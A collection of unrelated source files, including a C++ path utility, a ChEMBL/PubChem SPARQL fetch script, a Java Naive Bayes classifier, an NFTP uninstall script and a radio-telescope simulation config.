return -1;
}
S.pop();
}
return 0;
}
int path::rm(string name)
{
path::format(name);
if(isfile(name))
{
return remove(name.c_str());
}
vector<string> files = ls(name);
if(files.empty())
{
return rmdir(name.c_str());
}
for(auto it = files.begin(); it != files.end(); it++)
{
rm(it->c_str());
}
return rmdir(name.c_str());
}
string path::abspath(string filename)
{
path::format(filename);
#ifdef __linux__
char absolute_path[MAX_PATH+1];
char *ptr;
ptr = realpath(filename.c_str(), absolute_path);
return result;
#else
#ifdef USE_QT
return QFileInfo(QString::fromStdString(filename)).absoluteFilePath().toStdString();
#else
char absolute_path[MAX_PATH+1];
GetFullPathName(filename.c_str(), MAX_PATH, absolute_path, NULL);
string result = absolute_path;
format(result);
return result;
#endif
#endif
}
string path::relpath(string filename, string basepath)
{
filename = path::abspath(filename);
basepath = path::abspath(basepath);
if(filename[0] != basepath[0])
{
return filename;
}
int min_size = min(filename.size(), basepath.size());
int pos_not_equal = min_size;
for(int i = 0; i < min_size; i++)
{
if(filename[i] != basepath[i])
{
pos_not_equal = i;
break;
}
}
string result = "";
int pos = basepath.size()-1;
while(pos >= 0 && pos >= pos_not_equal)
{
result += "../";
while(pos >= 0 && pos >= pos_not_equal && basepath[pos] != '/')
{
pos--;
}
pos--;
}
pos++;
while(pos >= 0 && (size_t)pos < filename.size() && filename[pos] != '/')
{
pos--;
}
result += filename.substr(pos+1);
path::format(result);
return result;
}
string path::basename(const string& filename)
{
int name_begin = filename.find_last_of("/\\") + 1;
if((size_t)name_begin == string::npos)
{
return filename;
}
if((size_t)name_begin == filename.size())
{
return "";
}
return filename.substr(name_begin, filename.size()-name_begin);
}
string path::dirname(const string& full_name)
{
int end_pos = full_name.find_last_of("/\\");
if((size_t)end_pos == string::npos)
{
return ".";
}
else
{
return full_name.substr(0, end_pos);
}
}
string path::extname(const string& full_name)
{
int pos_point = full_name.find_last_of(".");
int pos_slash = full_name.find_last_of("/\\");
if(pos_slash < pos_point && (size_t)pos_point != full_name.size()-1)
{
return full_name.substr(pos_point+1, full_name.size()-pos_point-1);
}
else
{
return "";
}
}
int copy_file_to_dir(const string& filename, const string& dir_name)
{
if(-1 == path::mkdir(dir_name))
{
return -1;
}
if(path::isfile(dir_name + "/" + path::basename(filename)))
{
return 1;
}
ifstream ifile(filename.c_str(), ios::binary);
ofstream ofile((dir_name + "/" + path::basename(filename)).c_str(), ios::binary);
ofile << ifile.rdbuf();
ifile.close();
ofile.close();
return 0;
}
int copy_file_to_file(const string& src_filename, const string& dest_filename)
{
if(-1 == path::mkdir(path::dirname(dest_filename)))
{
return -1;
}
if(path::isfile(dest_filename))
{
return 1;
}
ifstream ifile(src_filename.c_str(), ios::binary);
ofstream ofile(dest_filename.c_str(), ios::binary);
ofile << ifile.rdbuf();
ifile.close();
ofile.close();
return 0;
}
int in_str(const string& target, char pattern)
{
int n = target.size();
for(int i = 0; i < n; i++)
{
if(target[i] == pattern)
{
return i;
}
}
return -1;
}
int path::cp(string src, string dest)
{
format(src);
format(dest);
if(!exists(src) || isfile(dest))
{
return -1;
}
if(dest == src)
{
return 1;
}
if(src[src.size()-1] == '/')
{
src.erase(src.end()-1);
}
string name = path::basename(dest);
if(isfile(src))
{
if(dest[dest.size()-1] == '/')
{
return copy_file_to_dir(src, dest);
}
else if((isdir(path::dirname(dest)) && !isdir(dest)) || in_str(name, '.') > 0)
{
return copy_file_to_file(src, dest);
}
else
{
return copy_file_to_dir(src, dest);
}
}
else
{
if(exists(dest))
{
dest = dest + "/" + path::basename(src);
}
vector<string> files = ls(src);
if(-1 == mkdir(dest))
{
return -1;
}
for(auto it = files.begin(); it != files.end(); it++)
{
cp(*it, dest);
}
}
return 0;
}
int path::mv(string src, string dest)
{
format(src);
format(dest);
if(src == dest)
{
return 1;
}
int flag = cp(src, dest);
rm(src);
return flag;
}
int path::rename(string src, string dest)
{
format(src);
if(src[src.size()-1] == '/')
{
src.erase(src.size()-1, 1);
}
if(path::basename(src) == dest)
{
return 1;
}
if(!exists(src) || in_str(dest, '/') != -1 || exists(path::dirname(src) + "/" + dest))
{
return -1;
}
return ::rename(src.c_str(), (path::dirname(src) + "/" + dest).c_str());
}
int path::touch(string filename)
{
format(filename);
if(isfile(filename))
{
return 1;
}
if(isdir(filename))
{
return -1;
}
if(-1 == mkdir(path::dirname(filename)))
{
return -1;
}
ofstream ofile(filename, ios::binary);
ofile.close();
return 0;
}
string path::cat(string filename)
{
ifstream ifile(filename.c_str());
stringstream buffer;
buffer << ifile.rdbuf();
return buffer.str();
}
|
#!/usr/bin/sh
set -euo pipefail
# PubChem IDとChEMBL IDのペアを取得する。
ENDPOINT=https://integbio.jp/rdf/ebi/sparql
WORKDIR=chembl2pubchem # 一時的にIDペアファイルを保存するディレクトリ
LIMIT=1000000 # SPARQLエンドポイントにおける取得可能データ件数の最大値
CURL=/usr/bin/curl
# ChEMBL IDとPubChem IDのペアを取得するクエリのテンプレート。
# 100万件以上あるので、本スクリプト中で、OFFSET/LIMIT を sed で追加して用いる。
CHEMBL_PUBCHEM_QUERY_FILE=query_01.rq
# 上記クエリで得られる結果の全件数を取得するクエリのテンプレート。
COUNT_CHEMBL_PUBCHEM_QUERY_FILE=query_01_count.rq
if [ ! -e $CHEMBL_PUBCHEM_QUERY_FILE ]; then echo "必要なファイルが不足しています。:$CHEMBL_PUBCHEM_QUERY_FILE"; exit; fi
if [ ! -e $COUNT_CHEMBL_PUBCHEM_QUERY_FILE ]; then echo "必要なファイルが不足しています。:$COUNT_CHEMBL_PUBCHEM_QUERY_FILE"; exit; fi
if [ ! -e $WORKDIR ]; then
mkdir $WORKDIR
else
rm -f ${WORKDIR}/*
fi
C2P_TOTAL=$($CURL -sSH "Accept: text/csv" --data-urlencode query@$COUNT_CHEMBL_PUBCHEM_QUERY_FILE $ENDPOINT | tail -1)
#echo 取得対象C2P数: $C2P_TOTAL
COUNT=$(expr $C2P_TOTAL / $LIMIT)
for i in $(seq 0 ${COUNT}); do
QUERY=$(sed -e "$ a OFFSET ${i}000000 LIMIT ${LIMIT}" $CHEMBL_PUBCHEM_QUERY_FILE)
$CURL -o ${WORKDIR}/${i}.txt -sSH "Accept: text/tab-separated-values" --data-urlencode query="$QUERY" $ENDPOINT
done
# エラー終了しているファイルを検索し、改めて検索、をエラーがなくなるまで行う。
# ファイル冒頭に "chembl_id" が書かれていない場合に、エラーと判断する。
ERROR_FILES=$(find ${WORKDIR} -type f -exec sh -c '(head -1 {} | grep -m 1 -q "^\"chembl_id\"") || basename {} .txt' \;)
while true; do
if [ -n "$ERROR_FILES" ]; then
for i in $ERROR_FILES; do
QUERY=$(sed -e "$ a OFFSET ${i}000000 LIMIT ${LIMIT}" $CHEMBL_PUBCHEM_QUERY_FILE)
$CURL -o ${WORKDIR}/${i}.txt -sSH "Accept: text/tab-separated-values" --data-urlencode query="$QUERY" $ENDPOINT
done
ERROR_FILES=$(for f in $ERROR_FILES; do echo ${WORKDIR}/${f}.txt; done | xargs -i sh -c '(head -1 {} | grep -m 1 -q "^\"chembl_id\"") || basename {} .txt')
sleep 5
else
break
fi
done
tail -qn +2 ${WORKDIR}/*.txt | sed -e 's/"//g'
|
<reponame>atrilla/emolib<filename>src/emolib/classifier/machinelearning/MultinomialNB.java
/*
* File : MultinomialNB.java
* Created : 25-Jul-2011
* By : atrilla
*
* Emolib - Emotional Library
*
* Copyright (c) 2011 <NAME> &
* 2007-2012 Enginyeria i Arquitectura La Salle (Universitat Ramon Llull)
*
* This file is part of Emolib.
*
* You should have received a copy of the rights granted with this
* distribution of EmoLib. See COPYING.
*/
package emolib.classifier.machinelearning;
import emolib.classifier.Classifier;
import emolib.classifier.FeatureBox;
import emolib.classifier.machinelearning.ARNReduced.Graph;
import emolib.classifier.machinelearning.ARNReduced.GraphElement;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.HashMap;
import java.lang.Math;
/**
* The <i>MultinomialNB</i> class is a Multinomial Naive
* Bayes (MNB) classifier.
*
* <p>
* It is a probabilistic generative approach
* that builds a language model assuming
* conditional independence among the features. In reality, this
* conditional independence assumption does not hold for text
* data, but even though the probability estimates of this
* oversimplified model are of low quality because of this, its
* classification decisions (based on Bayes’ decision rule) are
* surprisingly good. The MNB combines efficiency (its has
* an optimal time performance) with good accuracy.
* </p>
* <p>
* The MultinomialNB follows the implementation described in (Manning, et al.,
* 2008).
* The same term weighting schemes as the ones used in the ARN-R are
* considered.
* </p>
* <p>
* --<br>
* (Manning, et al., 2008) <NAME>., <NAME>. and
* <NAME>., "An Introduction to Information Retrieval", 2008.
* </p>
*
* @see emolib.classifier.machinelearning.ARNReduced
*
* @author <NAME> (<EMAIL>)
*/
public class MultinomialNB extends Classifier {
// Core
private ArrayList<ArrayList<Double>> theProbs;
private ArrayList<Double> thePriors;
// Term Weighting scheme core
private ARNReduced arnR;
private boolean bigramFreq;
private boolean posTags;
private boolean stemming;
private boolean synonyms;
private boolean emotionDims;
private boolean negation;
//
private boolean mutualInformation;
private boolean chiSquare;
private boolean termFreq;
private int numFeatSel;
//
private ArrayList<Graph> categoryGraph;
private Graph vocabularyGraph;
/**
* Main constructor of this exponential regression classifier.
*/
public MultinomialNB() {
theProbs = null;
thePriors = null;
arnR = null;
categoryGraph = null;
bigramFreq = false;
posTags = false;
stemming = false;
synonyms = false;
emotionDims = false;
negation = false;
mutualInformation = false;
chiSquare = false;
termFreq = false;
numFeatSel = 0;
}
/* (non-Javadoc)
* @see emolib.classifier.Classifier#getCategory(emolib.classifier.
* FeatureBox)
*/
public String getCategory(FeatureBox inputFeatures) {
// APPLY MULTINOMIALNB (C,V,prior,condprob,d)
int maxCat = 0;
double maxScore = 0;
boolean first = true;
// 1) W ← EXTRACT TOKENS FROM DOC (V,d)
Graph W = arnR.buildGraph(inputFeatures);
// 2) for each c ∈ C
double score = 0;
for (int c = 0; c < categoryGraph.size(); c++) {
// 3) do score(c) ← log prior (c)
score = Math.log(thePriors.get(c).doubleValue());
// 4) for each t ∈ W
for (int t = 0; t < vocabularyGraph.getNumberOfElements(); t++) {
// 5) do score(c) += log condprob(t)(c)
if (W.containsElement(vocabularyGraph.getElement(t))) {
score += Math.log(theProbs.get(c).get(t).doubleValue()) *
(double)W.getElementTermFrequency(
vocabularyGraph.getElement(t));
}
}
// 8) return arg maxc∈C score(c)
if (first) {
maxCat = 0; // again
maxScore = score;
first = false;
} else {
if (score > maxScore) {
maxScore = score;
maxCat = c;
}
}
}
return categoryGraph.get(maxCat).getCategoryName();
}
/**
* Training method based on the algorithm in (Manning, et al.,
* 2008).
* Nevertheless, doc counts are approximated by the sum of term freqs.
*
* (non-Javadoc)
* @see emolib.classifier.Classifier#trainingProcedure()
*/
public void trainingProcedure() {
ArrayList<FeatureBox> exampleFeatures = getListOfExampleFeatures();
ArrayList<String> exampleCategories = getListOfExampleCategories();
arnR = new ARNReduced();
setFeatureWeights();
Iterator exFeat = exampleFeatures.iterator();
Iterator exCat = exampleCategories.iterator();
while (exFeat.hasNext() && exCat.hasNext()) {
arnR.inputTrainingExample((FeatureBox)exFeat.next(),
(String)exCat.next());
}
// From (Manning, et al., 2008)
// TRAIN MULTINOMIALNB (C,D)
arnR.train();
categoryGraph = arnR.getCategoryGraphs();
theProbs = new ArrayList<ArrayList<Double>>();
thePriors = new ArrayList<Double>();
// 1) V ← EXTRACT VOCABULARY (D)
vocabularyGraph = arnR.getVocabularyGraph();
// 2) N ← COUNT DOCS (D)
double N = 0;
for (int c = 0; c < categoryGraph.size(); c++) {
N += (double)categoryGraph.get(c).getTotalSumTF();
}
double Nc = 0;
double Tct = 0;
ArrayList<Double> pVocab = null;
// 3) for each c in C
for (int c = 0; c < categoryGraph.size(); c++) {
// 4) do Nc ← COUNT DOCS IN CLASS (D,c)
Nc = (double)categoryGraph.get(c).getTotalSumTF();
// 5) prior(c) ← Nc /N
thePriors.add(new Double((double)Nc / (double)N));
// 6) textc ← CONCATENATE TEXT OF ALL DOCS IN CLASS(D,c)
// Done
// 7) for each t in V
pVocab = new ArrayList<Double>();
for (int t = 0; t < vocabularyGraph.getNumberOfElements(); t++) {
// 8) do Tct ← COUNT TOKENS OF TERM (textc,t)
Tct = (double)categoryGraph.get(c).
getElementTermFrequency(vocabularyGraph.getElement(t));
// 9 and 10) for each t ∈ V, condprob(t)(c)
pVocab.add(new Double((double)(Tct + 1) / (double)(Nc +
vocabularyGraph.getNumberOfElements())));
}
theProbs.add(pVocab);
}
// 11) return V, prior, condprob
}
/**
* Method to set the feature weights of the regression.
* It is required that the private reference to the ARN-R is
* initialised.
*/
private void setFeatureWeights() {
arnR.setCOF(bigramFreq);
arnR.setPOS(posTags);
arnR.setStems(stemming);
arnR.setSynonyms(synonyms);
arnR.setFeatSelMI(mutualInformation, numFeatSel);
arnR.setFeatSelChi2(chiSquare, numFeatSel);
arnR.setFeatSelTF(termFreq, numFeatSel);
}
/**
* Set the Mutual Information feature selection.
*
* @param mi The Mutual Information flag.
* @param numF The number of relevant features desired.
*/
public void setMI(boolean mi, int numF) {
mutualInformation = mi;
numFeatSel = numF;
}
/**
* Set the Chi square feature selection.
*
* @param chi The Chi2 flag.
* @param numF The number of relevant features desired.
*/
public void setChi2(boolean chi, int numF) {
chiSquare = chi;
numFeatSel = numF;
}
/**
* Set the Term Frequency feature selection.
*
* @param tf The Term Frequency flag.
* @param numF The number of relevant features desired.
*/
public void setTF(boolean tf, int numF) {
termFreq = tf;
numFeatSel = numF;
}
/**
* Method to consider bigram frequencies.
*
* @param cof The COF flag.
*/
public void setCOF(boolean cof) {
bigramFreq = cof;
}
/**
* Method to consider POS tags.
*
* @param pos The POS flag.
*/
public void setPOS(boolean pos) {
posTags = pos;
}
/**
* Method to consider stems.
*
* @param stems The stemming flag.
*/
public void setStemming(boolean stems) {
stemming = stems;
}
/**
* Method to consider synonyms.
*
* @param syns The synonyms flag.
*/
public void setSynonyms(boolean syns) {
synonyms = syns;
}
/**
* Method to consider emotion dimensions.
*
* @param emodims The emotion dimensions flag.
*/
public void setEmotionDims(boolean emodims) {
emotionDims = emodims;
}
/**
* Method to consider negations.
*
* @param neg The negation flag.
*/
public void setNegation(boolean neg) {
negation = neg;
}
/* (non-Javadoc)
* @see emolib.classifier.Classifier#save(java.lang.String)
*/
public void save(String path) {
}
/* (non-Javadoc)
* @see emolib.classifier.Classifier#load(java.lang.String)
*/
public void load(String path) {
}
/* (non-Javadoc)
* @see emolib.classifier.Classifier#resetExamples()
*/
@Override
public void resetExamples() {
super.resetExamples();
theProbs = null;
thePriors = null;
arnR = null;
}
}
|
<reponame>lukaselmer/find_and_restore_big_files
class ResultTracker
def initialize(repo)
@repo = repo
@paths = repo.generate_paths
@hashes = repo.generate_hashes
end
def path_exists?(file)
@paths.include?(file.path)
end
def store(file)
hash = @repo.generate_hash(file.path)
@hashes << hash unless @hashes.include?(hash)
@paths << file.path unless @paths.include?(file.path)
end
def content_exists?(file)
# or, better: store hash s.t. compare_files(file1.hash, file2.hash) = true iff file1 is at least 90% similar to file2
@hashes.any? { |hash| @repo.generate_hash(file.path) == hash }
end
end
|
proj_path=$(dirname $(dirname "${this_exe_path}"))
classify_exe="${proj_path}/bld/uni/classify"
gen_exe="${proj_path}/bld/uni/generate"
xlate_exe="${proj_path}/bld/uni/xlate"
function calc_domsz()
{
local domsz btsz
domsz=2
btsz=$(printf '%s' "$1" | wc -c)
while [ $(($domsz * $domsz * $domsz)) -lt $btsz ]
do
domsz=$(($domsz + 1))
done
printf '%s' $domsz
}
|
#!/bin/bash
for f in flip_SCITE/*ml0.gv
do
g=$(basename $f)
m=`echo $g | sed -e "s/^m\([0-9]*\)_n\([0-9]*\)_s\([0-9]*\)_k\([0-9]*\)_loss\(0\.[0-9]*\)_a\(0\.[0-9]*\)_b\(0\.[0-9]*\).*/\1/g"`
n=`echo $g | sed -e "s/^m\([0-9]*\)_n\([0-9]*\)_s\([0-9]*\)_k\([0-9]*\)_loss\(0\.[0-9]*\)_a\(0\.[0-9]*\)_b\(0\.[0-9]*\).*/\2/g"`
python processSCITE.py $f $m $n > $(dirname $f)/$(basename $f _ml0.gv).A
done
|
<filename>mc-commons/mc-common-core/src/main/java/com/mc/common/constant/ServiceNameConstants.java<gh_stars>1-10
package com.mc.common.constant;
/**
* [ServiceNameConstants 服务名称常量]
*
* @author likai
* @version 1.0
* @date 2019/12/10 0010 18:19
* @company Gainet
* @copyright copyright (c) 2019
*/
public interface ServiceNameConstants {
/**
* 用户权限服务
*/
String USER_SERVICE = "user-center";
/**
* 搜索中心服务
*/
String SEARCH_SERVICE = "search-center";
}
|
#include <iostream>
using namespace std;
void reverse(int a[][2])
{
for (int i = 1; i >= 0; i--)
for (int j = 1; j >= 0; j--)
cout << a[i][j] << " ";
}
int main()
{
int a[2][2] = {{2, 3}, {4, 5}};
reverse(a);
return 0;
} |
<gh_stars>0
var signup = document.getElementById('signup');
var main = document.getElementById('main');
var children = main.children;
function sign(){
var selected = document.getElementById('signup-form');
alert(children.length);
for(var child of children){
if(child.getAttribute('class')=='signup'){
child.style.display = 'block';
} else {
child.style.display = 'none';
}
}
}
signup.onclick = sign;
|
<reponame>zhangyut/wolf
package com.bn.box2d.sndls;
import static com.bn.box2d.sndls.Constant.*;
import android.graphics.Canvas;
import android.graphics.Matrix;
import android.graphics.Paint;
public class Pijin
{
public static float[][] lcon=
{
{54,20},
{93,20}
};
float lx;
float ly;
float dx;
float dy;
static boolean flag=false;
public Pijin(float lx,float ly,float dx,float dy)
{
this.lx=lx;
this.ly=ly;
this.dx=dx;
this.dy=dy;
}
public float[] getDegrees(float arg0,float arg1,float arg2,float arg3)
{
float[] degrees=new float[2];
float yoffset=arg3-arg1;
float xoffset=arg2-arg0;
degrees[0]=(float) Math.sqrt(xoffset*xoffset+yoffset*yoffset);
degrees[1]=(float) Math.toDegrees(Math.asin(yoffset/degrees[0]));
return degrees;
}
public void drawSelf(Canvas canvas,Paint paint)
{
if(lx<150*yMainRatio&&!flag)
{
float[] degrees=getDegrees(lx,ly,dx,dy);
setMatrix(canvas,paint,degrees);
}
else
{
flag=true;
float[] degrees=getDegrees(lx,ly,dx,dy);
setMatrix(canvas,paint,degrees);
}
}
public void setMatrix(Canvas canvas,Paint paint,float[] degrees)
{
canvas.save();
Matrix m1=new Matrix();
m1.setTranslate(lx+PIC_ARRAY[1].getWidth(), ly+PIC_ARRAY[1].getHeight()/2);
Matrix m2=new Matrix();
m2.setRotate(degrees[1]);
Matrix m3=new Matrix();
m3.setConcat(m1, m2);
Matrix m4=new Matrix();
float xrotate=(float) (degrees[0])/PIC_ARRAY[24].getWidth();
m4.setScale(xrotate, 1);
Matrix m5=new Matrix();
m5.setConcat(m3, m4);
canvas.drawBitmap(PIC_ARRAY[24], m5, paint);
canvas.restore();
}
} |
<filename>src/materials/Light.hpp
#ifndef LIGHT_H
#define LIGHT_H
#include <memory>
#include "../Vector3.hpp"
#include "../Material.hpp"
#include "../Texture.hpp"
class Light : public Material
{
public:
Light(std::shared_ptr<Texture> a);
Light(Color3 c);
virtual bool scatter(const Ray &r_in, const HitRecord &rec, Color3 &attenuation, Ray &scattered) const override;
virtual Color3 emitted(float u, float v, const Vector3 &p) const;
private:
std::shared_ptr<Texture> _emit;
};
#endif |
cd "/Users/gggyu/Documents/git/Reading-Hadoop/hadoop-project-dist/target"
tar cf - hadoop-project-dist-2.6.0 | gzip > hadoop-project-dist-2.6.0.tar.gz |
#!/bin/bash
cd examples/taxi
mvn test
|
package com.banana.volunteer.service.Impl;
import com.banana.volunteer.entity.Branch;
import com.banana.volunteer.entity.Organization;
import com.banana.volunteer.enums.ResultEnum;
import com.banana.volunteer.exception.BusinessException;
import com.banana.volunteer.repository.BranchRepository;
import com.banana.volunteer.repository.OrganizationRepository;
import com.banana.volunteer.service.OrganizationService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class OrganizationServiceImpl implements OrganizationService {
@Autowired
private OrganizationRepository orgRepository;
@Autowired
private BranchRepository braRepository;
@Override
public String findOrgNameByBranchId(Integer branchId) {
Branch branch = braRepository.findByBranchId(branchId);
Organization organization = orgRepository.findByOrgId(branch.getOrgId());
return organization.getOrgName();
}
@Override
public List<Organization> findAllOrg() {
return orgRepository.findAll();
}
@Override
public List<Branch> findAllBranchByOrgId(Integer orgId) {
return braRepository.findAllByOrgId(orgId);
}
@Override
public Integer findOrgIdByBranchId(Integer branchId) {
Branch branch = braRepository.findByBranchId(branchId);
if (branch == null) {
return null;
}
return branch.getOrgId();
}
@Override
public Integer findOrgIdByOrgName(String orgName) {
Organization organization = orgRepository.findByOrgName(orgName);
if (organization == null) {
return null;
}
return organization.getOrgId();
}
@Override
public String findOrgNameByOrgId(Integer orgId) {
Organization organization = orgRepository.findByOrgId(orgId);
if (organization == null) {
return null;
}
return organization.getOrgName();
}
@Override
public String findBranchNameByBranchId(Integer branchId) {
Branch branch = braRepository.findByBranchId(branchId);
if (branch == null) {
return null;
}
return branch.getBranchName();
}
@Override
public void deleteOrgByOrgId(Integer orgId) {
orgRepository.deleteById(orgId);
}
@Override
public Organization updateOrg(Organization organization) {
return orgRepository.saveAndFlush(organization);
}
@Override
public Organization createOrg(Organization organization) {
if (!orgRepository.findById(organization.getOrgId()).isPresent()) {
return orgRepository.saveAndFlush(organization);
} else {
throw new BusinessException(ResultEnum.ID_DUPLICATE);
}
}
@Override
public List<Branch> findAllBranch() {
return braRepository.findAll();
}
@Override
public void deleteBranchByBranchId(Integer branchId) {
braRepository.deleteById(branchId);
}
@Override
public Branch createBranch(Branch branch) {
if (!braRepository.findById(branch.getBranchId()).isPresent()) {
return braRepository.saveAndFlush(branch);
} else {
throw new BusinessException(ResultEnum.ID_DUPLICATE);
}
}
@Override
public Branch updateBranch(Branch branch) {
return braRepository.saveAndFlush(branch);
}
}
|
. /opt/intel/ictce/3.2.0.020/ictvars.sh
|
def findMissingElement(array):
n = len(array)
total = (n + 1)*(n + 2)/2
sum_of_array = sum(array)
return total - sum_of_array
# Driver code
array = [1, 2, 3, 4, 6, 7, 8]
print("Missing element is",
findMissingElement(array)) |
#!/bin/sh
# This shell script removes NFTP binaries and support files
# look up installation
IS_ROOT=`id | grep "uid=0(root)" | wc -l`
if [ $IS_ROOT -eq 1 ]
then
if [ -d /usr/lib/nftp ]
then
TARGETBIN="/usr/bin"
TARGETLIB="/usr/lib/nftp"
else
TARGETBIN="/usr/local/bin"
TARGETLIB="/usr/local/lib/nftp"
fi
TARGETDOC="/usr/doc/nftp"
TARGETMAN="/usr/man/man1"
else
TARGETBIN=$HOME/bin
TARGETLIB=$HOME/.nftp
TARGETDOC=
TARGETMAN=
fi
# Issue a message for user and wait for decision
clear
echo
echo "NFTP uninstallation."
echo
echo "This script will REMOVE the following files:"
echo
echo "NFTP executable: " $TARGETBIN/nftp
if [ $IS_ROOT -eq 1 ]
then
echo "Directory " $TARGETLIB
echo "Man page for NFTP: " $TARGETMAN/nftp.1
echo "Documentation: " $TARGETDOC"/*"
else
echo "National language support files: " $TARGETLIB"/nls/*"
echo "Template for initialization file: " $TARGETLIB/nftp.i
echo "Base bookmark list: " $TARGETLIB/nftp.bm
echo "Keynames executable: " $TARGETLIB/keynames
echo "Script for uninstalling NFTP: " $TARGETLIB/uninstall.sh
fi
echo
if [ $IS_ROOT -eq 1 ]
then
echo "Entire subdirectory " $TARGETLIB " will be removed."
else
echo "Subdirectory " $TARGETLIB " will not be deleted."
fi
echo "Your personal files in ~/.nftp will be kept intact."
echo "Press ENTER to continue, or Ctrl-C to cancel"
read x
# Remove everything
echo -n "Deleting executables: "
echo $TARGETBIN/nftp
rm -f $TARGETBIN/nftp
if [ $IS_ROOT -eq 1 ]
then
echo "Removing " $TARGETLIB " directory"
rm -rf $TARGETLIB
else
echo -n "Deleting support files: "
echo $TARGETLIB/keynames $TARGETLIB/nftp.i $TARGETLIB/nftp.bm $TARGETLIB/uninstall.sh
rm -f $TARGETLIB/keynames $TARGETLIB/nftp.i $TARGETLIB/nftp.bm $TARGETLIB/uninstall.sh
echo -n "Deleting NLS files: "
echo $TARGETLIB/nls/*.nls $TARGETLIB/nls/*.dos
rm -f $TARGETLIB/nls/*.nls $TARGETLIB/nls/*.dos
fi
if [ $IS_ROOT -eq 1 ]
then
echo -n "Deleting manual page and HTML documentation: "
echo $TARGETMAN/nftp.1 $TARGETDOC/*.html $TARGETDOC/readme.*
rm -f $TARGETMAN/nftp.1 $TARGETDOC/*.html $TARGETDOC/readme.*
fi
echo "Deinstallation is complete."
|
#!/usr/bin/bash
# General
parsetdir=parsets
logdir=logs
slurms=slurmFiles
slurmOutput=slurmOutput
msdir=MS
chunkdir=../ModelImages/Chunks
slicedir=../ModelImages/Slices
doCreateModel=false
# Whether to slice up the model prior to simulating - set to false
# if we've already done this
doSlice=false
doCalibrator=false
doScience=true
doCorrupt=false
randomgainsparset=${parsetdir}/randomgains.in
doNoise=true
Tsys=50
#nfeeds=36
nfeeds=1
antennaConfig=ASKAP18
nant=18
pol="XX XY YX YY"
inttime=5s
##################################
# For 1934 calibration observation
#
firstPointingID=0
lastPointingID=`expr ${nfeeds} - 1`
msbaseCal=calibrator_J1934m638_${inttime}_${now}
ra1934=294.854275
ra1934str=19h39m25.036
dec1934=-63.712675
dec1934str=-63.42.45.63
direction1934="[${ra1934str}, ${dec1934str}, J2000]"
. ${simScripts}/makeCalHArange.sh
#Gridding parameters
nw=201
os=8
###############################
# For science field observation
#
msbaseSci=sciencefield_${antennaConfig}_SKADS_${inttime}_${nfeeds}beam_${now}
if [ $nfeeds -eq 36 ]; then
feeds=${askapconfig}/ASKAP${nfeeds}feeds-footprint-square_6x6.in
else
feeds=${askapconfig}/ASKAP${nfeeds}feeds.in
fi
antennaParset=${askapconfig}/${antennaConfig}.in
# Time required for the csimulator jobs
TIME_CSIM_JOB=2:30:00
# Set this to true if we want to mimic the correlator layout (48MHz blocks, each producing its own MS)
matchCorrelatorLayout=true
if [ $matchCorrelatorLayout == true ]; then
# Number of MSs to end up with after 2nd stage of merging
NUM_FINAL_MS=7
msbaseSci=sciencefield_${antennaConfig}_by${NUM_FINAL_MS}_SKADS_${inttime}_${nfeeds}beam_${now}
NGROUPS_CSIM=28
NWORKERS_CSIM=65
chanPerMSchunk=10
NPPN_CSIM=3
TILENCHAN=54
else
# Number of MSs to end up with after 2nd stage of merging
NUM_FINAL_MS=8
NGROUPS_CSIM=32
NWORKERS_CSIM=171
chanPerMSchunk=3
NPPN_CSIM=3
TILENCHAN=54
fi
NCPU_CSIM=`echo $NWORKERS_CSIM | awk '{print $1+1}'`
if [ `echo $NGROUPS_CSIM $NUM_FINAL_MS | awk '{print $1 % $2 }'` -ne 0 ]; then
echo "Number of groups (${NGROUPS_CSIM}) not a multiple of number of final MSs (${NUM_FINAL_MS})."
echo "Not running."
doSubmit=false
else
NUM_GROUPS_PER_FINAL=`echo $NGROUPS_CSIM $NUM_FINAL_MS | awk '{print $1/$2}'`
fi
# Whether to remove the intermediate MSs once the merging step has
# completed successfully
CLOBBER_INTERMEDIATE_MS=true
catdir=/group/askap/whi550/Simulations/InputCatalogue
sourcelist=master_possum_catalogue_trim10x10deg.dat
doFlatSpectrum=false
baseimage=SKADS_model_matchADE_${nfeeds}beam
writeByNode=true
createTT_CR=true
npixModel=3072
nsubxCR=9
nsubyCR=5
CREATORTASKS=`echo $nsubxCR $nsubyCR | awk '{print $1*$2+1}'`
CREATORWORKERPERNODE=1
CREATORNODES=`echo $CREATORTASKS ${CREATORWORKERPERNODE} | awk '{print int($1/$2)}'`
SLICERNPPN=20
#databaseCR=POSSUM
databaseCR=POSSUMHI
#databaseCR=joint
posType=deg
PAunits=rad
useGaussianComponents=true
if [ $databaseCR == "POSSUM" ]; then
listtypeCR=continuum
baseimage="${baseimage}_cont"
elif [ $databaseCR == "POSSUMHI" ]; then
#listtypeCR=spectralline
listtypeCR=continuum
baseimage="${baseimage}_C+HI"
elif [ $databaseCR == "joint" ]; then
# This is the case for when we've combined the continuum and HI
# models into "_joint" models
baseimage="${baseimage}_joint"
fi
modelimage=${chunkdir}/${baseimage}
# Size and pixel scale of spatial axes
npix=$npixModel
rpix=`echo $npix | awk '{print $1/2}'`
cellsize=3
delt=`echo $cellsize | awk '{print $1/3600.}'`
# Central position for the input model
ra=187.5
dec=-45.0
# And how that is translated for the csimulator jobs
raStringVis="12h30m00.000"
decStringVis="-45.00.00"
baseDirection="[${raStringVis}, ${decStringVis}, J2000]"
# Does the catalogue need precessing? If so, central position of catalogue.
WCSsources=true
raCat=0.
decCat=0.
# Spectral axis - full spectral range & resolution
freqChanZeroMHz=1421
nchan=18144
rchan=0
chanw=-18.5185185e3
rfreq=`echo ${freqChanZeroMHz} | awk '{printf "%8.6e",$1*1.e6}'`
basefreq=`echo $nchan $rchan $rfreq $chanw | awk '{printf "%8.6e",$3 + $4*($2+$1/2)}'`
# Polarisation axis - use full stokes for these models
nstokes=4
rstokes=0
stokesZero=0
dstokes=1
spwbaseSci=${parsetdir}/spws_sciencefield
observationLengthHours=8
# duration for csimulator parset - have observation evenly split over
# transit, so give hour angle start/stop times
dur=`echo $observationLengthHours | awk '{print $1/2.}'`
|
package cc.soham.toggle.objects;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
public class Config {
@SerializedName("name")
@Expose
public String name;
@SerializedName("features")
@Expose
public List<Feature> features = new ArrayList<Feature>();
// a map representing the list of features, supports lookup in constant time O(1)
public transient Map<String, Feature> featureMap = new HashMap<>();
public Config(String name, List<Feature> features) {
this.name = name;
this.features = features;
generateFeatureMap();
}
/**
* Generates a {@link Map} out of the features {@link List}
*/
